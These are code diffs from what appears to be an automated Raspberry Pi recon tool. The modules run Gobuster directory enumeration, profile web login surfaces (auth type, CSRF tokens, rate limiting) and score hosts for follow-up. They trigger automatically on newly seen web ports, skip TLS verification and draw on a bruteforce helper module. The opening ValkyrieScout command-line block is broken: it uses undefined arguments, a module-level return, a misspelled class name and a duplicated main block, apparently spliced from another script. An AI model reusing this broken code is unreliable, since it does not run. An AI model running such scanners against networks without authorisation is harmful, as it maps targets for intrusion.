paths = getattr(self.shared_data, "valkyrie_scout_paths", None)
if not isinstance(paths, list) or not paths:
paths = DEFAULT_PATHS
# UI
self.shared_data.bjorn_orch_status = "ValkyrieScout"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
max_bytes=max_bytes,
)
# Only keep minimal info; do not store full HTML.
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
payload = {
"signals": signals,
"sample": {"status": int(status), "content_type": ctype, "rt_ms": int(elapsed_ms)},
}
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
payload=payload,
user_agent=user_agent,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"status": str(status),
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
if delay_s > 0:
time.sleep(delay_s)
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ValkyrieScout (light web scout)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="80")
args = parser.parse_args()
settings = load_settings()
url = args.url or settings.get("url")
wordlist = args.wordlist or settings.get("wordlist")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
delay = args.delay or settings.get("delay")
sd = SharedData()
act = ValkyrieScout(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": ""}
print(act.execute(args.ip, args.port, row, "ValkyrieScout"))
if not url:
logging.error("URL is required. Use -u or save it in settings")
return
save_settings(url, wordlist, output_dir, threads, delay)
scanner = ValkyieScout(
url=url,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
delay=delay
)
scanner.execute()
if __name__ == "__main__":
main()


@@ -3,11 +3,11 @@
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table
- ON CONFLICT(mac_address, ip, port, directory) DO UPDATE
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit)
- No filesystem output: parse Gobuster stdout directly
- Dynamic filtering of HTTP status codes via shared_data.web_status_codes
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
- Updates bjorn_progress with actual percentage (0-100%).
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
- No filesystem output: parse Gobuster stdout/stderr directly.
- Dynamic filtering of HTTP statuses via shared_data.web_status_codes.
"""
import re
@@ -15,6 +15,9 @@ import socket
import subprocess
import threading
import logging
import time
import os
import select
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
@@ -27,8 +30,8 @@ b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
@@ -36,8 +39,6 @@ b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
# Fallback value if the UI has not initialized shared_data.web_status_codes yet
# (default: useful 2xx codes, 3xx, 401/403/405 and all 5xx; 429 excluded)
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
@@ -50,7 +51,6 @@ CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
# /images (Status: 200) [Size: 12345]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
@@ -60,13 +60,14 @@ GOBUSTER_LINE = re.compile(
re.VERBOSE
)
# Regex to capture Gobuster's progress output on stderr
# e.g.: "Progress: 1024 / 4096 (25.00%)"
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
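As a quick sanity check, the progress pattern above can be exercised on the sample stderr line from the comment. `GOBUSTER_PROGRESS_RE` and the hypothetical `parse_progress` helper are redefined locally so this sketch runs standalone:

```python
import re

# Local copy of the pattern defined above, so the sketch is self-contained.
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")

def parse_progress(line: str):
    """Return (current, total, percent) or None if the line is not a progress line."""
    m = GOBUSTER_PROGRESS_RE.search(line)
    if not m:
        return None
    current, total = int(m.group("current")), int(m.group("total"))
    pct = min((current / total) * 100 if total else 0.0, 100.0)
    return current, total, pct

print(parse_progress("Progress: 1024 / 4096 (25.00%)"))  # → (1024, 4096, 25.0)
```

The same capped-percentage computation is what feeds `shared_data.bjorn_progress` in the streaming loop below.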
def _normalize_status_policy(policy) -> Set[int]:
"""
Turn a "UI" policy into a set of integer HTTP status codes.
policy may contain:
- int (e.g. 200, 403)
- "xXX" (e.g. "2xx", "5xx")
- "a-b" (e.g. "500-504")
"""
codes: Set[int] = set()
if not policy:
@@ -99,30 +100,48 @@ def _normalize_status_policy(policy) -> Set[int]:
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
In-memory only: no CSV, no temp files.
Streaming mode: Reads stdout/stderr in real-time for DB inserts and Progress UI.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
# Cache the wordlist size (used for the % computation)
self.wordlist_size = 0
self._count_wordlist_lines()
# ---- Sanity checks
import os
self._available = True
if not os.path.exists(self.gobuster_path):
raise FileNotFoundError(f"Gobuster not found at {self.gobuster_path}")
logger.error(f"Gobuster not found at {self.gobuster_path}")
self._available = False
if not os.path.exists(self.wordlist):
raise FileNotFoundError(f"Wordlist not found: {self.wordlist}")
logger.error(f"Wordlist not found: {self.wordlist}")
self._available = False
# Policy coming from the UI: create it if absent
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
f"WebEnumeration initialized (stdout mode, no files). "
f"Using status policy: {self.shared_data.web_status_codes}"
f"WebEnumeration initialized (Streaming Mode). "
f"Wordlist lines: {self.wordlist_size}. "
f"Policy: {self.shared_data.web_status_codes}"
)
def _count_wordlist_lines(self):
"""Count the wordlist lines once, to compute the completion %."""
if self.wordlist and os.path.exists(self.wordlist):
try:
# Fast buffered read
with open(self.wordlist, 'rb') as f:
self.wordlist_size = sum(1 for _ in f)
except Exception as e:
logger.error(f"Error counting wordlist lines: {e}")
self.wordlist_size = 0
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
@@ -184,155 +203,195 @@ class WebEnumeration:
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
# -------------------- Gobuster runner (stdout) --------------------
def _run_gobuster_stdout(self, url: str) -> Optional[str]:
base_cmd = [
self.gobuster_path, "dir",
"-u", url,
"-w", self.wordlist,
"-t", "10",
"--quiet",
"--no-color",
# If your gobuster version supports it, you can cut the noise at the source:
# "-b", "404,429",
]
def run(cmd):
return subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# Try with -z first
cmd = base_cmd + ["-z"]
logger.info(f"Running Gobuster on {url}...")
try:
res = run(cmd)
if res.returncode == 0:
logger.success(f"Gobuster OK on {url}")
return res.stdout or ""
# Fallback if -z is unknown
if "unknown flag" in (res.stderr or "").lower() or "invalid" in (res.stderr or "").lower():
logger.info("Gobuster doesn't support -z, retrying without it.")
res2 = run(base_cmd)
if res2.returncode == 0:
logger.success(f"Gobuster OK on {url} (no -z)")
return res2.stdout or ""
logger.info(f"Gobuster failed on {url}: {res2.stderr.strip()}")
return None
logger.info(f"Gobuster failed on {url}: {res.stderr.strip()}")
return None
except Exception as e:
logger.error(f"Gobuster exception on {url}: {e}")
return None
def _parse_gobuster_text(self, text: str) -> List[Dict]:
"""
Parse gobuster stdout lines into entries:
{ 'path': '/admin', 'status': 301, 'size': 310, 'redirect': 'http://...'|None }
"""
entries: List[Dict] = []
if not text:
return entries
for raw in text.splitlines():
# 1) strip ANSI/control BEFORE regex
line = ANSI_RE.sub("", raw)
line = CTL_RE.sub("", line)
line = line.strip()
if not line:
continue
m = GOBUSTER_LINE.match(line)
if not m:
logger.debug(f"Unparsed line: {line}")
continue
# 2) extract all fields NOW
path = m.group("path") or ""
status = int(m.group("status"))
size = int(m.group("size") or 0)
redir = m.group("redir")
# 3) normalize path
if not path.startswith("/"):
path = "/" + path
path = "/" + path.strip("/")
entries.append({
"path": path,
"status": status,
"size": size,
"redirect": redir.strip() if redir else None
})
logger.info(f"Parsed {len(entries)} entries from gobuster stdout")
return entries
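The full `GOBUSTER_LINE` pattern is elided by the hunk boundary above, so here is a rough standalone sketch of the parsing step. The `Size`/redirect groups in `LINE_RE` are an assumption reconstructed from the example lines in the comment, not the file's exact regex:

```python
import re

# Hypothetical reconstruction of GOBUSTER_LINE -- the exact pattern is
# truncated in the diff above, so treat this as illustrative only.
LINE_RE = re.compile(
    r"""^(?P<path>\S+)\s*
        \(Status:\s*(?P<status>\d{3})\)\s*
        (?:\[Size:\s*(?P<size>\d+)\])?\s*
        (?:\[-->\s*(?P<redir>[^\]]+)\])?\s*$""",
    re.VERBOSE,
)

def parse_line(line: str):
    """Parse one gobuster 'dir' result line into a dict, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "path": "/" + m.group("path").strip("/"),   # normalize leading slash
        "status": int(m.group("status")),
        "size": int(m.group("size") or 0),
        "redirect": (m.group("redir") or "").strip() or None,
    }

print(parse_line("/admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]"))
```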
# -------------------- Public API --------------------
# -------------------- Public API (Streaming Version) --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
Run gobuster on (ip,port), parse stdout, upsert each finding into DB.
Run gobuster on (ip,port), STREAM stdout/stderr, upsert findings real-time.
Updates bjorn_progress with 0-100% completion.
Returns: 'success' | 'failed' | 'interrupted'
"""
if not self._available:
return 'failed'
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before start (orchestrator flag).")
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
logger.info(f"Enumerating {base_url} ...")
self.shared_data.bjornorch_status = "WebEnumeration"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted before gobuster run.")
return "interrupted"
stdout_text = self._run_gobuster_stdout(base_url)
if stdout_text is None:
return "failed"
if self.shared_data.orchestrator_should_exit:
logger.info("Interrupted after gobuster run (stdout captured).")
return "interrupted"
entries = self._parse_gobuster_text(stdout_text)
if not entries:
logger.warning(f"No entries for {base_url}.")
return "success" # scan ran fine but no findings
# ---- Dynamic filtering based on shared_data.web_status_codes
allowed = self._allowed_status_set()
pre = len(entries)
entries = [e for e in entries if e["status"] in allowed]
post = len(entries)
if post < pre:
preview = sorted(list(allowed))[:10]
logger.info(
f"Filtered out {pre - post} entries not in policy "
f"{preview}{'...' if len(allowed) > 10 else ''}."
)
# Setup Initial UI
self.shared_data.comment_params = {"ip": ip, "port": str(port), "url": base_url}
self.shared_data.bjorn_orch_status = "WebEnumeration"
self.shared_data.bjorn_progress = "0%"
logger.info(f"Enumerating {base_url} (Stream Mode)...")
# Prepare Identity & Policy
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
allowed = self._allowed_status_set()
for e in entries:
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=e["path"],
status=e["status"],
size=e.get("size", 0),
response_time=0, # gobuster doesn't expose timing here
content_type=None, # unknown here; a later HEAD/GET probe can fill it
tool="gobuster"
# Command Construction
# NOTE: Removed "--quiet" and "-z" to ensure we get Progress info on stderr
# But we use --no-color to make parsing easier
cmd = [
self.gobuster_path, "dir",
"-u", base_url,
"-w", self.wordlist,
"-t", "10", # Safe for RPi Zero
"--no-color",
"--no-progress=false", # Force progress bar even if redirected
]
process = None
findings_count = 0
stop_requested = False
# For progress calc
total_lines = self.wordlist_size if self.wordlist_size > 0 else 1
last_progress_update = 0
try:
# Merge stdout and stderr so we can read everything in one loop
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
bufsize=1,
universal_newlines=True
)
return "success"
# Use select() (on Linux) so we can react quickly to stop requests
# without blocking forever on readline().
while True:
if self.shared_data.orchestrator_should_exit:
stop_requested = True
break
if process.poll() is not None:
# Process exited; drain remaining buffered output if any
line = process.stdout.readline() if process.stdout else ""
if not line:
break
else:
line = ""
if process.stdout:
if os.name != "nt":
r, _, _ = select.select([process.stdout], [], [], 0.2)
if r:
line = process.stdout.readline()
else:
# Windows: select() doesn't work on pipes; best-effort read.
line = process.stdout.readline()
if not line:
continue
# 3. Clean Line
clean_line = ANSI_RE.sub("", line).strip()
clean_line = CTL_RE.sub("", clean_line).strip()
if not clean_line:
continue
# 4. Check for Progress
if "Progress:" in clean_line:
now = time.time()
# Update UI max every 0.5s to save CPU
if now - last_progress_update > 0.5:
m_prog = GOBUSTER_PROGRESS_RE.search(clean_line)
if m_prog:
curr = int(m_prog.group("current"))
# Calculate %
pct = (curr / total_lines) * 100
pct = min(pct, 100.0)
self.shared_data.bjorn_progress = f"{int(pct)}%"
last_progress_update = now
continue
# 5. Check for Findings (Standard Gobuster Line)
m_res = GOBUSTER_LINE.match(clean_line)
if m_res:
st = int(m_res.group("status"))
# Apply Filtering Logic BEFORE DB
if st in allowed:
path = m_res.group("path")
if not path.startswith("/"): path = "/" + path
size = int(m_res.group("size") or 0)
redir = m_res.group("redir")
# Insert into DB Immediately
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=path,
status=st,
size=size,
response_time=0,
content_type=None,
tool="gobuster"
)
findings_count += 1
# Live feedback in comments
self.shared_data.comment_params = {
"url": base_url,
"found": str(findings_count),
"last": path
}
continue
# (Optional) Log errors/unknown lines if needed
# if "error" in clean_line.lower(): logger.debug(f"Gobuster err: {clean_line}")
# End of loop
if stop_requested:
logger.info("Interrupted by orchestrator.")
return "interrupted"
self.shared_data.bjorn_progress = "100%"
return "success"
except Exception as e:
logger.error(f"Execute error on {base_url}: {e}")
if process:
try:
process.terminate()
except Exception:
pass
return "failed"
finally:
if process:
try:
if stop_requested and process.poll() is None:
process.terminate()
# Always reap the child to avoid zombies.
try:
process.wait(timeout=2)
except Exception:
try:
process.kill()
except Exception:
pass
try:
process.wait(timeout=2)
except Exception:
pass
finally:
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
except Exception as e:
logger.error(f"Execute error on {ip}:{port}: {e}")
logger.error(f"General execution error: {e}")
return "failed"
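The streaming pattern used in `execute` above (a `Popen` pipe polled with `select()` so a stop flag can be honored between reads) can be reduced to a minimal POSIX-only sketch. The 0.2 s poll timeout and merged stderr mirror the code above; the `sh -c` child and `stream_lines` helper are stand-ins for illustration:

```python
import select
import subprocess

def stream_lines(cmd, should_stop=lambda: False, poll_timeout=0.2):
    """Yield output lines from cmd, checking should_stop between reads."""
    proc = subprocess.Popen(
        cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
        text=True, bufsize=1,
    )
    try:
        while True:
            if should_stop():
                proc.terminate()
                break
            if proc.poll() is not None:
                # Child exited: drain whatever is still buffered, then stop.
                for line in proc.stdout:
                    yield line.rstrip("\n")
                break
            # select() on pipes is POSIX-only, as the original code notes.
            readable, _, _ = select.select([proc.stdout], [], [], poll_timeout)
            if readable:
                line = proc.stdout.readline()
                if line:
                    yield line.rstrip("\n")
    finally:
        proc.stdout.close()
        proc.wait(timeout=5)   # always reap the child to avoid zombies

lines = list(stream_lines(["sh", "-c", "echo one; echo two"]))
print(lines)  # → ['one', 'two']
```

The same drain-then-reap discipline is what the `finally` block above implements with `terminate()`/`kill()` fallbacks.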
@@ -341,7 +400,7 @@ if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration...")
logger.info("Starting web directory enumeration (CLI)...")
rows = shared_data.read_data()
for row in rows:
@@ -351,6 +410,7 @@ if __name__ == "__main__":
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":


@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_login_profiler.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebLoginProfiler"
b_module = "web_login_profiler"
b_status = "WebLoginProfiler"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 55
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
"/",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
"/robots.txt",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
# Very cheap login form heuristics
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
# Rate limit / lockout hints
rate_limited = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
cookie_names = []
if set_cookie:
# Parse only cookie names cheaply
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
framework_hints = []
for cn in cookie_names:
l = cn.lower()
if l in {"csrftoken", "sessionid"}:
framework_hints.append("django")
elif l in {"laravel_session", "xsrf-token"}:
framework_hints.append("laravel")
elif l == "phpsessid":
framework_hints.append("php")
elif "wordpress" in l:
framework_hints.append("wordpress")
server = h.get("server", "")
powered = h.get("x-powered-by", "")
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"rate_limited_hint": bool(rate_limited),
"server": server,
"x_powered_by": powered,
"cookie_names": cookie_names[:12],
"framework_hints": sorted(set(framework_hints))[:6],
}
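The cheap `Set-Cookie` parsing used in `_detect_signals` above (split on `,`, keep only the name before the first `=`/`;`) can be shown in isolation; `cookie_names_from_header` is a local helper, not part of the module:

```python
def cookie_names_from_header(set_cookie: str):
    """Extract cookie names from a (possibly comma-folded) Set-Cookie value."""
    names = []
    for part in set_cookie.split(","):
        # Drop attributes after ';', then drop the value after '='.
        name = part.split(";", 1)[0].split("=", 1)[0].strip()
        if name and name not in names:
            names.append(name)
    return names

header = "sessionid=abc123; Path=/; HttpOnly, csrftoken=xyz; Secure"
print(cookie_names_from_header(header))  # → ['sessionid', 'csrftoken']
```

Note the same caveat applies to the original: an `Expires` attribute containing a comma would split awkwardly, which is acceptable for a cheap fingerprinting pass.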
class WebLoginProfiler:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _db_upsert(self, *, mac: str, ip: str, hostname: str, port: int, path: str,
status: int, size: int, response_ms: int, content_type: str,
method: str, user_agent: str, headers_json: str):
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'login_profiler', ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
method or "GET",
user_agent or "",
headers_json or "",
),
)
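The `ON CONFLICT ... DO UPDATE` upsert in `_db_upsert` above can be sketched against an in-memory SQLite database. This uses a toy schema, not the real `webenum` table, just to show that a repeat write updates the row instead of duplicating it:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE webenum_demo ("
    " ip TEXT, port INTEGER, directory TEXT, status INTEGER,"
    " UNIQUE(ip, port, directory))"
)

def upsert(ip, port, directory, status):
    # Same upsert shape as the real query: the UNIQUE key drives the conflict.
    conn.execute(
        """
        INSERT INTO webenum_demo (ip, port, directory, status)
        VALUES (?, ?, ?, ?)
        ON CONFLICT(ip, port, directory) DO UPDATE SET
            status = excluded.status
        """,
        (ip, port, directory, status),
    )

upsert("10.0.0.5", 80, "/admin", 301)
upsert("10.0.0.5", 80, "/admin", 200)   # second write updates, not duplicates
row = conn.execute("SELECT status, COUNT(*) FROM webenum_demo").fetchone()
print(row)  # → (200, 1)
```

`ON CONFLICT` upserts require SQLite 3.24+, which any current Python build ships.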
def _fetch(self, *, ip: str, port: int, scheme: str, path: str, timeout_s: float,
user_agent: str) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
body_snip = ""
headers_out: Dict[str, str] = {}
status = 0
size = 0
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
# Read only a small chunk (Pi-friendly) for fingerprinting.
chunk = resp.read(65536) # 64KB
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebProfiler/1.0"))
paths = getattr(self.shared_data, "web_login_profiler_paths", None) or DEFAULT_PATHS
if not isinstance(paths, list):
paths = DEFAULT_PATHS
self.shared_data.bjorn_orch_status = "WebLoginProfiler"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
found_login = 0
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
)
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
if signals.get("looks_like_login") or signals.get("auth_type"):
found_login += 1
headers_payload = {
"signals": signals,
"sample": {
"status": status,
"content_type": ctype,
},
}
try:
headers_json = json.dumps(headers_payload, ensure_ascii=True)
except Exception:
headers_json = ""
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
method="GET",
user_agent=user_agent,
headers_json=headers_json,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
progress.set_complete()
# "success" means: profiler ran; not that a login exists.
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""


@@ -0,0 +1,233 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import time
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_surface_mapper.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebSurfaceMapper"
b_module = "web_surface_mapper"
b_status = "WebSurfaceMapper"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_success:WebLoginProfiler"
b_priority = 45
b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _safe_json_loads(s: str) -> dict:
try:
return json.loads(s) if s else {}
except Exception:
return {}
def _score_signals(signals: dict) -> int:
"""
Heuristic risk score 0..100.
This is not an "attack recommendation"; it's a prioritization for recon.
"""
if not isinstance(signals, dict):
return 0
score = 0
auth = str(signals.get("auth_type") or "").lower()
if auth in {"basic", "digest"}:
score += 45
if bool(signals.get("looks_like_login")):
score += 35
if bool(signals.get("has_csrf")):
score += 10
if bool(signals.get("rate_limited_hint")):
# Defensive signal: reduces priority for noisy follow-ups.
score -= 25
hints = signals.get("framework_hints") or []
if isinstance(hints, list) and hints:
score += min(10, 3 * len(hints))
return max(0, min(100, int(score)))
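A worked example of the scoring heuristic above; the weights in `score_signals` are copied from `_score_signals` so the numbers can be checked standalone:

```python
def score_signals(signals: dict) -> int:
    # Same weights as _score_signals above.
    if not isinstance(signals, dict):
        return 0
    score = 0
    if str(signals.get("auth_type") or "").lower() in {"basic", "digest"}:
        score += 45
    if bool(signals.get("looks_like_login")):
        score += 35
    if bool(signals.get("has_csrf")):
        score += 10
    if bool(signals.get("rate_limited_hint")):
        score -= 25          # defensive signal lowers priority
    hints = signals.get("framework_hints") or []
    if isinstance(hints, list) and hints:
        score += min(10, 3 * len(hints))
    return max(0, min(100, int(score)))

# Basic-auth login surface with CSRF and two framework hints: 45+35+10+6
print(score_signals({
    "auth_type": "basic",
    "looks_like_login": True,
    "has_csrf": True,
    "framework_hints": ["django", "php"],
}))  # → 96
```

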